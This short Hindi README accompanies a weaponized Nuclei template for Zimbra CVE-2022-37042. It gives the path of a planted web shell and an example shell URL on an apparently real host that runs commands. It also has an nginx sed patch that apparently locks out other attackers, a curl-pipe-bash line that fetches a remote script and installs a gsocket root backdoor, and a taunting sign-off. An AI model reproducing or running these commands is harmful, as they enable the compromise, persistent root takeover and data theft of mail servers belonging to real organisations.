
Zimbra CVE-2022-37042 Nuclei हथियारबद्ध टेम्पलेट
शेल पथ: /public/formatter.jsp
Nuclei स्वयं: https://github.com/projectdiscovery/nuclei
शेल में 0 अपारदर्शिता वाला छिपा हुआ इनपुट है, इसलिए बस उस पर माउस घुमाएँ, कमांड टाइप करें, फिर [Enter] कुंजी दबाएँ:
उदाहरण शेल url:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
यह कमांड चलाएँ (लेकिन केवल एक बार):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
Nginx नहीं बल्कि Apache वाले सर्वरों के लिए अतिरिक्त कोड की आवश्यकता है। पुल रिक्वेस्ट का स्वागत है।
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
यह कमांड global-socket (https://www.gsocket.io/deploy/) स्थापित करेगा और आपको रूट के रूप में कनेक्ट करने की कुंजी देगा।
जन्मदिन मुबारक हो नरसंहार, कमीने ;)